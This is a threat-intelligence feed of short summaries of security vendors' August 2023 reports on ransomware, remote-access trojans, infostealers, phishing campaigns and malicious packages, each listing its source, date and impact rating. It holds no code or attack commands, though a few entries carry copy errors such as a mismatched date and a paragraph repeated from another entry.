- Researchers from Fortinet looked into Trash Panda and a fresh, tiny NoCry ransomware strain. Windows-based malware called Trash Panda was initially discovered in the first few days of August. On infected computers, it encrypts files, changes the desktop background, and drops a ransom note with political statements. The Windows platform ransomware known as NoCry was first identified in April 2021. The creators of the NoCry ransomware produce variations that are then offered for sale on the group’s Telegram channel.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-trash-panda-and-nocry-variant
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Tool_Deployed_by_Cuba_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have discovered and documented new tools used by the Cuba ransomware threat group. It is currently in the fourth year of its operation and shows no sign of slowing down. In the first half of 2023 alone, the operators behind Cuba ransomware were the perpetrators of several high-profile attacks across disparate industries.
—
- Intel Source:
- Lumen
- Intel Name:
- HiatusRAT_Returns_To_Action_After_A_Short_Break
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- Lumen researchers have continued to track threat actor resulting in new malware samples and infrastructure associated with the HiatusRAT cluster. In the latest campaign, they observed a shift in reconnaissance and targeting activity.
—
- Intel Source:
- eSentire
- Intel Name:
- StealC_Delivering_via_Deceptive_Google_Sheets
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Esentire have discovered that a malicious advertisement that the user saw while trying to download Google Sheets was the infection’s point of origin. This advertisement sent the visitor to a malicious website that contained a downloader for the malware StealC infostealer.
Source:
https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_a_Zalando_Phishing_to_a_RAT
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have seen a bunch of phishing emails targeting Zalando customers.
Source:
https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Gozi_Malware_Launches_Another_Attack
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- Researchers at IBM Security Intelligence have noticed that the Gozi malware has returned and is now focusing on cryptocurrency platforms, banks, and other financial institutions.
Source:
https://securityintelligence.com/posts/gozi-strikes-again-targeting-banks-cryptocurrency-and-more/
—
- Intel Source:
- Sysdig
- Intel Name:
- Malicious_Campaign_Targeting_GitLab
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- The Sysdig Threat Research Team have discovered a new, financially motivated operation, dubbed LABRAT. This operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks.
Source:
https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
—
- Intel Source:
- Security Affairs
- Intel Name:
- Massive_phishing_campaign_targets_energy_sector
- Date of Scan:
- 2023-08-17
- Impact:
- MEDIUM
- Summary:
- Starting this May 2023, researchers from Cofense have observed a massive phishing campaign using QR codes in attacks to steal the Microsoft credentials of users from multiple industries. One of the organizations targeted by hackers is a notable energy company in the US.
Source:
https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html?amp=1
—
- Intel Source:
- Welivesecurity
- Intel Name:
- A_new_phishing_campaign_targeting_Zimbra_users
- Date of Scan:
- 2023-08-17
- Impact:
- LOW
- Summary:
- ESET researchers have uncovered a mass-spreading phishing campaign, aimed at collecting Zimbra account users’ credentials, active since at least April 2023 and still ongoing. Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. The campaign is mass-spreading; its targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the greatest number of targets are located in Poland, followed by Ecuador and Italy. To date, we have not attributed this campaign to any known threat actors.
Source:
https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/
—
- Intel Source:
- ASEC
- Intel Name:
- Hakuna_Matata_ransomware
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Recently, ASEC reserachers has discovered the Hakuna Matata ransomware is used to attack Korean companies. Hakuna Matata is a recent ransomware and it was first time identified in July, 2023 on Twitter. Later this month, a post of a threat actor using Hakuna Matata on the dark web was shared on Twitter as well. Also to be mentined by researchers that the ransomware strains uploaded on VirusTotal, the file uploaded on July 2nd, 2023 is confirmed to be the first case.
—
- Intel Source:
- Cyberint
- Intel Name:
- Raccoon_Stealer_Malware_Returns
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyberint researchers have seen that the developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals. It is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors.
Source:
https://cyberint.com/blog/financial-services/raccoon-stealer/
—
- Intel Source:
- Trustwave
- Intel Name:
- The_rise_of_LLM_engines_WormGPT_and_FraudGPT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Trustwave researchers discussed in their blog two such LLM engines that were up for sale available on underground forums, WormGPT and FraudGPT. If criminals would get their own ChatGPT-like tool, the implications for cybersecurity, social engineering, and overall digital safety could be so damagimg. This prospect highlights the importance of staying vigilant in our efforts to secure, and responsibly develop, artificial intelligence technology in order to mitigate potential risks and safeguard against misuse.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wormgpt-and-fraudgpt-the-rise-of-malicious-llms/
https://netenrich.com/blog/fraudgpt-the-villain-avatar-of-chatgpt
—
- Intel Source:
- Uptycs
- Intel Name:
- QwixxRAT_aka_Telegram_RAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- The Uptycs researchers discovered QwixxRAT (aka Telegram RAT) in early August 2023. The threat actor is widely distributing their malicious tool through Telegram and Discord platforms. Once installed on the victim’s Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker’s Telegram bot, providing them with unauthorized access to the victim’s sensitive information.
Source:
https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram
—
- Intel Source:
- Netscope
- Intel Name:
- Phishing_Campaign_Steals_Cloud_Credentials
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Last couple months Netskope Threat Labs analysts has been monitoring a staggering 61-fold increase in traffic to phishing pages hosted in Cloudflare R2. The most of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps. The attacks have been targeting victims mainly in North America and Asia, across different segments, led by the technology, financial services, and banking sectors.
—
- Intel Source:
- Cyble
- Intel Name:
- Amadey_Bot_leveraged_by_LummaC_Stealer_to_Deploy_SectopRAT
- Date of Scan:
- 2023-08-16
- Impact:
- LOW
- Summary:
- Cyble reserachers has recently come across a novel approach for spreading SectopRAT. This technique entails delivering the SectopRAT payload by utilizing the Amadey bot malware, which is retrieved from the LummaC stealer.
Source:
https://cyble.com/blog/lummac-stealer-leveraging-amadey-bot-to-deploy-sectoprat/
—
- Intel Source:
- AT&T
- Intel Name:
- The_Shadow_Nexus_of_Malware_and_Proxy_Application
- Date of Scan:
- 2023-08-16
- Impact:
- MEDIUM
- Summary:
- Researchers from AT&T Alien Labs found a significant campaign of attacks distributing a proxy server application on Windows computers. Additionally, a proxy service provider was found, whose proxy requests are forwarded through hacked systems that have been turned into residential exit nodes by malware invasion.
—
- Intel Source:
- HP ThreatResearch
- Intel Name:
- The_malware_campaigns_use_a_variety_of_programming_languages
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Last couple months, HP ThreatResrearch team have noticed a surge of finance-themed malicious spam campaigns spreading malware through batch scripts (.bat). The campaigns use a wide variety of programming languages to achieve different objectives within the infection chain – from batch scripts, PowerShell, Go, shellcode to .NET.
Source:
https://threatresearch.ext.hp.com/do-you-speak-multiple-languages-malware-does/
—
- Intel Source:
- Fortinet
- Intel Name:
- Continues_OSS_Supply_Chain_Attacks_Hidden_in_the_Python_Package
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Python Package Index (PyPI) packages have become a common thing for threat actors to post malware that unsuspecting victims possible download. The FortiGuard Labs analysts has been monitoring that activity attack vector for some time and posted the update of the zero-day attacks they have discovered. Recently, they discovered several new zero-day PyPI attacks using this AI engine assistant.
Source:
https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi
—
- Intel Source:
- Trellix
- Intel Name:
- NetSupportRAT_exploring_new_techniques
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- Trellix researchers observed a new campaign using fake Chrome browser updates to trick victims to install a remote administration software tool called NetSupport Manager. The threat actors take advantage of this software to steal information and take control of victim computers. The detected campaign has similarity with previously reported SocGholish campaign, which was run by a suspected Russian threat actor.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Stealthy_Malicious_MSI_Loader
- Date of Scan:
- 2023-08-15
- Impact:
- LOW
- Summary:
- The Cyfirma reserachers has observed a disguised Stealthy MSI Loader being advertised in dark web forums by Russian threat actor, showcasing it has a potential ability to evade detection by both Virus Total scan and Windows Defender. Additionally, through the researchers’s investigation, it was established a link between this MSI Loader and the BatLoader campaign observed in March 2023, highlighting potential coordination between these threats.
—
- Intel Source:
- Akamai
- Intel Name:
- New_Magento_Campaign_Discovered_called_Xurum
- Date of Scan:
- 2023-08-14
- Impact:
- LOW
- Summary:
- Over the past few months, Akamai has been closely monitoring a focused campaign that specifically targets a relatively small number of Magento deployments. They dubbed the campaign Xurum to reference the domain name of the C2 server utilized by the attacker.
Source:
https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell#:~:text=Akamai%20researchers%20have%20discovered%20an%20ongoing%20server-side%20template
of%20the%20attacker%E2%80%99s%20command%20and%20control%20%28C2%29%20server.
—
- Intel Source:
- Zscaler
- Intel Name:
- Unraveling_a_New_Threat_Targeting_LATAM_FinTech_Users
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- JanelaRAT, a newly discovered cyber threat, has been unveiled by Zscaler ThreatLabz. Primarily focused on the Latin American (LATAM) financial sector, this sophisticated malware employs advanced techniques including DLL side-loading and dynamic command and control infrastructure. With capabilities ranging from evasive maneuvers to self-defense mechanisms, the threat aims to compromise sensitive financial data. The malware’s origins are suggested by Portuguese strings in its code and a Portuguese-speaking developer, highlighting its targeted region and intentions.
—
- Intel Source:
- Trendmicro
- Intel Name:
- Monti_Ransomware_Group_Resumes_Attacks_with_New_Linux_Variant
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observe the Monti ransomware group, resembling Conti, resumes attacks on legal and government sectors with a fresh Linux variant. Unlike previous versions, this variant modifies encryption methods, uses an infection marker, and alters system files.
—
- Intel Source:
- CERT UA
- Intel Name:
- Phishing_Attack_Targeting_Government_Agencies
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA has identified a phishing attack on government agencies involving fraudulent emails from CERT-UA urging password change through a malicious link. The attackers imitate Roundcube’s interface and use a deceptive subdomain
—
- Intel Source:
- CISA
- Intel Name:
- Updates_on_SEASPY_and_WHIRLPOOL_Backdoors
- Date of Scan:
- 2023-08-14
- Impact:
- MEDIUM
- Summary:
- The US Department of Homeland Security (CISA) has published a report on Barracuda email servers that were compromised by cyber-thieves in the summer of 2016 and the following year. CISA obtained four malware samples – including SEASPY and WHIRLPOOL backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-221a
—
- Intel Source:
- Sucuri
- Intel Name:
- The_surge_in_malware_cases_linked_to_a_Gootloader_payload_delivery
- Date of Scan:
- 2023-08-12
- Impact:
- LOW
- Summary:
- This month, Sucuri analysts traced a noticeable surge in malwares linked to a malicious payload delivery system known as Gootloader. The group behind this malware is believed to operate a malware-as-a-service operation, exclusively providing a malware delivery service for other threat actors. In their blog, Sucuri is dicussing why Gootloader is so effective, and go into the details of inner workings and shed light on the tactics employed by the operators behind it.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_SugarCRM_CVE_2023_22952_zero_day_vulnerability
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- A zero-day vulnerability in the SugarCRM customer relationship management platform was used by threat actors to gain access to customers’ AWS accounts, according to a report from Palo Alto Networks Unit 42.
Source:
https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/
—
- Intel Source:
- SOCRadar
- Intel Name:
- A_new_cybercriminals_service_called_Dark_Utilities
- Date of Scan:
- 2023-08-12
- Impact:
- MEDIUM
- Summary:
- In their blog, Cisco Talos shared that they observed malware samples using Dark Utilities service in the wild to establish C2 communications channels and remote access capabilities on infected systems. They discovered malware targeted Windows and Linux systems leveraging Dark Utilities
Source:
https://socradar.io/dark-utilities-platform-provides-c2-server-for-threat-actors/
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Using_Freezers_And_SYK_Crypter_to_Distribute_Malware
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard have discovered a brand-new Rust-written injector that can introduce XWorm and shellcode into a victim’s environment. Additionally, an investigation by researchers showed a sharp rise in injector activity in May 2023. To avoid antivirus detection, shellcode can be encrypted using AES, RC4, or LZMA, and it can be Base64-encoded.
Source:
https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter
—
- Intel Source:
- Securelist
- Intel Name:
- Unknown_Actor_Using_DroxiDat_and_Cobalt_Strike
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Securelist researchers have seen a new SystemBC variant deployed to a critical infrastructure target. This time, the proxy-capable backdoor was deployed alongside Cobalt Strike beacons in a South African nation’s critical infrastructure.
Source:
https://securelist.com/focus-on-droxidat-systembc/110302/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- MoustachedBouncer_cyberespionage_activity_against_diplomats
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- MoustachedBouncer is a cyberespionage group discovered by ESET Research since 2014. Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild. Welinesecurity reserachers believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its AitM operations.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Common_TTPs_of_attacks_against_industrial_organizations
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Kaspersky ICS Cert analysts identified over 15 implants and their variants planted by the threat actor(s) in various combinations. The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems. Analysts have medium to high confidence that a threat actor called APT31, also known as Judgment Panda and Zirconium, is behind the activities described in their report.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Most_Recent_STRRAT_Version_Contains_Dual_Obfuscation_Layers
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- The Cyble Research and Intelligence Labs have discovered a fresh method of infection that is used to spread STRRAT. This novel approach entails disseminating STRRAT version 1.6, which makes use of two string obfuscation strategies.
Source:
https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/
—
- Intel Source:
- ASEC
- Intel Name:
- Changes_in_CHM_Malware_Distribution
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- ASEC has previously published a CHM malware type coping Korean financial institutes and insurance companies. Recently, the execution method of this malware type has been changing every week. ASEC post will cover how the changed execution processes of the CHM malware are recorded in AhnLab’s EDR products.
—
- Intel Source:
- Sucuri
- Intel Name:
- Hybrid_malware_leveraging_various_internet_protocols
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Sucuri analysts discover periodically an unique hybrid malware leveraging various internet protocols. During a recent investigation, the analysts found an interesting piece of JavaScript malware that indirectly uses the DNS protocol to obtain redirect URLs.
—
- Intel Source:
- Sentinelone
- Intel Name:
- In_Depth_Analysis_of_LOLKEK_Payloads
- Date of Scan:
- 2023-08-11
- Impact:
- LOW
- Summary:
- Researchers from SentinelLabs have examined LOLKEK Payload sample sets. Small to medium-sized enterprises (SMBs) and individual users are typically the main objectives.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Zero_Day_Exploit_Case_Study_CVE_2023_36874
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- In July 2023, the CrowdStrike Falcon team observed an unknown exploit with unknown vulnerability affecting the Windows Error Reporting (WER) component. Crowdstrike team put their findings to their report about this new vulnerability to Microsoft. Microsoft assigned the identifier CVE-2023-36874 to the vulnerability.
Source:
https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Campaign_Against_NATO_Aligned_Foreign_Ministries
- Date of Scan:
- 2023-08-11
- Impact:
- MEDIUM
- Summary:
- Two PDF documents have been spotted, and EclecticIQ researchers believe with high confidence that they are a part of a continuous campaign aimed at NATO member countries’ foreign ministries. The PDF files contained two fake diplomatic invitations that appeared to be coming from the German embassy.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Attackers_Using_EvilProxy_Phishing_Kit
- Date of Scan:
- 2023-08-10
- Impact:
- HIGH
- Summary:
- Threat actors have been using the phishing toolkit EvilProxy to take control of cloud-based Microsoft 365 accounts belonging to executives at prominent companies.Researchers said the attacks exhibited both the prevalence of pre-packaged phishing-as-a-service toolkits, as well as the increased bypassing of multi-factor authentication to gain access to accounts.
—
- Intel Source:
- AT&T
- Intel Name:
- AdLoad_Turns_Mac_Systems_into_Proxy_Exit_Nodes
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild.
Source:
https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload
—
- Intel Source:
- ASEC
- Intel Name:
- Tax_Invoices_and_Shipping_Statements_Posing_as_GuLoader_Malware
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered instances in which GuLoader was sent as an attachment in emails that were falsely labeled as shipping bills and tax invoices. A RAR (Roshal Archive packed) packed file included the freshly discovered GuLoader variation. GuLoader eventually downloads well-known malware strains including Remcos, AgentTesla, and Vidar when it is run by a user.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Injection
- Date of Scan:
- 2023-08-10
- Impact:
- LOW
- Summary:
- High numbers of the Magniber ransomware are routinely disseminated. It has been disseminated through the Internet Explorer vulnerability for the past few years, however when the browser’s support ended, the vulnerability is no longer being exploited. Recently, the ransomware has started spreading through Chrome and Edge browsers using filenames impersonating Windows security update packages (such as ERROR.Center.Security.msi). Currently, Magniber injects the ransomware into an active process, causing damage by encrypting the user’s files.
—
- Intel Source:
- Aquasec
- Intel Name:
- Kubernetes_Exposed
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- The potential catastrophe of having Kubernetes (k8s) cluster hijacked is could be a disaster magnified a million times over. Aquasec researchers investigated and uncovered Kubernetes clusters belonging to more than 350 organizations, open-source projects, and individuals, openly accessible and largely unprotected. At least 60% of them were breached and had an active campaign that deployed malware and backdoors.
Source:
https://blog.aquasec.com/kubernetes-exposed-one-yaml-away-from-disaster
—
- Intel Source:
- Cyble
- Intel Name:
- The_AgentTesla_malware_attack
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening Tax related documents and accompanying control panel files (CPL).
Source:
https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/
—
- Intel Source:
- Zscalar
- Intel Name:
- New_InfoStealer_Named_Statc_Stealer
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have discovered a new information stealer family called Statc Stealer. It is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.
Source:
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_Python_Package_Campaign_Targets_Developers_through_PyPI
- Date of Scan:
- 2023-08-09
- Impact:
- MEDIUM
- Summary:
- Researchers from ReversingLabs identified persistent campaign leverages malicious Python packages on PyPI to deceive developers. Attackers mimic popular open-source tools, embedding hidden malicious code. They create matching GitHub repositories for credibility and employ dynamic command and control URLs
—
- Intel Source:
- Cyble
- Intel Name:
- Uncovering_Tech_Scammers_involved_in_different_ransomware_attacks
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- Cyble researchers recently observed a new Tech Scam campaign. It seemed it has involved scammers setting up a non-existent antivirus solution site to deceive users into paying for non-existent services. During analysis, researchers discovered various ransomware variants leveraged by tech scammers to propagate their fraudulent schemes.
Source:
https://cyble.com/blog/utilization-of-leaked-ransomware-builders-in-tech-related-scams/
—
- Intel Source:
- ASEC
- Intel Name:
- The_Malware_distribution_as_Coin_exchange
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- ASEC lab response Center has recently discovered a new malware disguised with coin exchange and investment-related topics. The malware is pretended in the form of an executable and a Word file.It is suspected that it was created by the Kimsuky group.
—
- Intel Source:
- ASEC
- Intel Name:
- The_malware_installation_as_normal_file_of_a_Korean_Development_Company
- Date of Scan:
- 2023-08-09
- Impact:
- LOW
- Summary:
- AhnLab has previously mentioned about the malware that is generated by the installation file of a Korean program development company. When malware is distributed alongside an installation file, users will struggle to notice that malware is being executed concurrently.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Investigating_the_Big_Head_Ransomware
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- After first appearing in May 2023, Big Head Ransomware is a relatively new actor in the cyber threat environment. This malicious program is made up of several different varieties, each with its own features and powers. Little is known about the threat actor who is responsible for the Big Head Ransomware. The actor has been seen interacting with victims on Telegram and through emails.
Source:
https://socradar.io/dark-web-profile-big-head-ransomware/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- An_Overview_of_Qakbot_Infrastructure
- Date of Scan:
- 2023-08-08
- Impact:
- LOW
- Summary:
- Team-Cymru researchers have provided an update on the high-level analysis of QakBot infrastructure, this represents an ongoing piece of research, their analysis of QakBot is fluid with various hypotheses being identified and tested. As and when they uncover new insights into QakBot campaigns they will seek to provide further written updates.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory
—
- Intel Source:
- TrendMicro
- Intel Name:
- TargetCompany_Ransomware_Abusing_FUD_Obfuscator_Packers
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- In order to persistently deploy its initial stage, the most recent version of the TargetCompany ransomware first exploits weak SQL servers. The code tries many approaches to try persistence, such as switching the URLs or relevant routes, until it successfully locates a location to run the Remcos RAT.
—
- Intel Source:
- Fortinet
- Intel Name:
- DoDo_and_Proton_Ransomware_targeting_windows_users
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have discovered the Ransomware Roundup report highlights the emerging threats of DoDo and Proton ransomware variants, both specifically designed to target Microsoft Windows users. DoDo ransomware, a derivative of Chaos ransomware, disguises itself as an educational application called “Mercurial Grabber” to steal information and encrypt victims’ files. Its recent variants demand ransom for file decryption and data non-disclosure. Meanwhile, Proton ransomware encrypts files on Windows systems, demanding a ransom for file recovery.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-dodo-and-proton
—
- Intel Source:
- Trend Micro
- Intel Name:
- Water_minyades_batloader_malware
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers observe the Water Minyades Batloader malware has evolved with Pyarmor Pro obfuscation, making manual de-obfuscation difficult. Using large MSI files, it initiates a sophisticated kill chain, fingerprinting victim networks and delivering second-stage payloads for stealthy attacks.
Source:
https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html
—
- Intel Source:
- Talos
- Intel Name:
- New_Threat_Actor_Leveraging_Customized_Yashma_Ransomware
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified an unknown threat actor, who appears to be of Vietnamese descent, who has been operating ransomware since at least June 4, 2023. This continuing attack makes use of a Yashma ransomware version that mimics WannaCry traits and is expected to target several locations. The ransom note is sent using an unusual method by the threat actor. They execute an embedded batch file to download the ransom note from the actor-controlled GitHub repository rather than inserting the ransom note strings in the malware.
Source:
https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/
—
- Intel Source:
- Sentilone
- Intel Name:
- North_Korea_icompromised_Russian_Missile_Engineering_Company
- Date of Scan:
- 2023-08-07
- Impact:
- MEDIUM
- Summary:
- SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya. Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
—
- Intel Source:
- CERT UA
- Intel Name:
- MerlinAgent_cyber_attacks_against_Ukraine
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Ukraine’s CERT-UA is warning of malicious emails posing as official communications. The emails contain harmful attachments, leading to the execution of dangerous scripts and the deployment of the malicious “ctlhost.exe” associated with the MerlinAgent program
—
- Intel Source:
- Security Affairs
- Intel Name:
- NPM_highly_targeted_attacks
- Date of Scan:
- 2023-08-07
- Impact:
- LOW
- Summary:
- Security Affairs researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data.
Source:
https://securityaffairs.com/149165/hacking/npm-highly-targeted-attacks.html
—
- Intel Source:
- PT Security
- Intel Name:
- The_Cyber_Campaign_by_Space_Pirates_in_Russia_and_Serbia
- Date of Scan:
- 2023-08-05
- Impact:
- MEDIUM
- Summary:
- Using unique strategies and acquiring new cyber weapons, the threat actor known as Space Pirates has been connected to attacks on at least 16 organizations in Serbia and Russia over the past year. Governmental organizations, educational institutions, private security firms, aerospace makers, agricultural producers, defense, energy, and healthcare companies are among the targets.
—
- Intel Source:
- Any.Run
- Intel Name:
- Remcos_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- Any.Run malware hunting service recorded a video for Remcos RAT execution and analysis. Remcos is a remote access trojan – a malware used to take remote control over infected PCs. This trojan is created and sold to clients by a “business” called Breaking Security. Remcos trojan can be delivered in different forms. Based on RAT’s analysis, it can be spread as an executable file with the name that should convince users to open it, or it pretends to bne a Microsoft Word file that exploits vulnerabilities.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_Small_LNK_to_Large_Malicious_BAT_File_With_Zero_VT_Score
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have seen my spam trap caught an e-mail with LNK attachment, the e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient.
Source:
https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/
—
- Intel Source:
- Any Run
- Intel Name:
- Redline_Malware_Analysis
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- ANY.RUN researchers did the analysis and watched the RedLine malware actions in an interactive sandbox simulation. RedLine Stealer or RedLine is malware that can collect users’ confidential information and deliver other malicious programs.
—
- Intel Source:
- MetaBase Q
- Intel Name:
- Botnet_Fenix_new_botnet
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Threat Intel team at Metabase Q has discovered a local group that created a new botnet called as “Fenix,” which specifically targets users accessing government services, particularly tax-paying individuals in Mexico and Chile. The attackers redirect victims to fraudulent websites that mimic the official portals These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Play_ransomware_activity
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- TrendMicro have observed the Play ransomware group amplified their activity with a number of new tools and exploits, including the vulnerabilities ProxyNotShell, OWASSRF, and a Microsoft Exchange Server Remote Code Execution. More recently, it’s also begun to use new tools like Grixba, a custom network scanner and infostealer, and the open-source VSS management tool AlphaVSS.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play
—
- Intel Source:
- Securelist
- Intel Name:
- Emotet_DarkGate_and_LokiBot_new_analyses
- Date of Scan:
- 2023-08-04
- Impact:
- MEDIUM
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
Source:
https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Attack_Method_of_Rhysida_Ransomware
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- The Rhysida Ransomware Group has become a serious threat in the online environment. In a short period of time, Rhysida posed a significant concern to businesses all across the world with its powerful encryption capabilities and double extortion tactics. The group’s emphasis on attacking military and governmental institutions, as seen in their assault on the Chilean Army, emphasizes how serious their actions may be.
Source:
https://socradar.io/threat-profile-rhysida-ransomware/
—
- Intel Source:
- McAfee
- Intel Name:
- The_Back_to_School_Scams
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- McAfee Labs analysts has discovered the following PDFs targeting back-to-school trends. Their article warns the parents on what to educate their children on and how not to fall victim to such fraud. McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction.
Source:
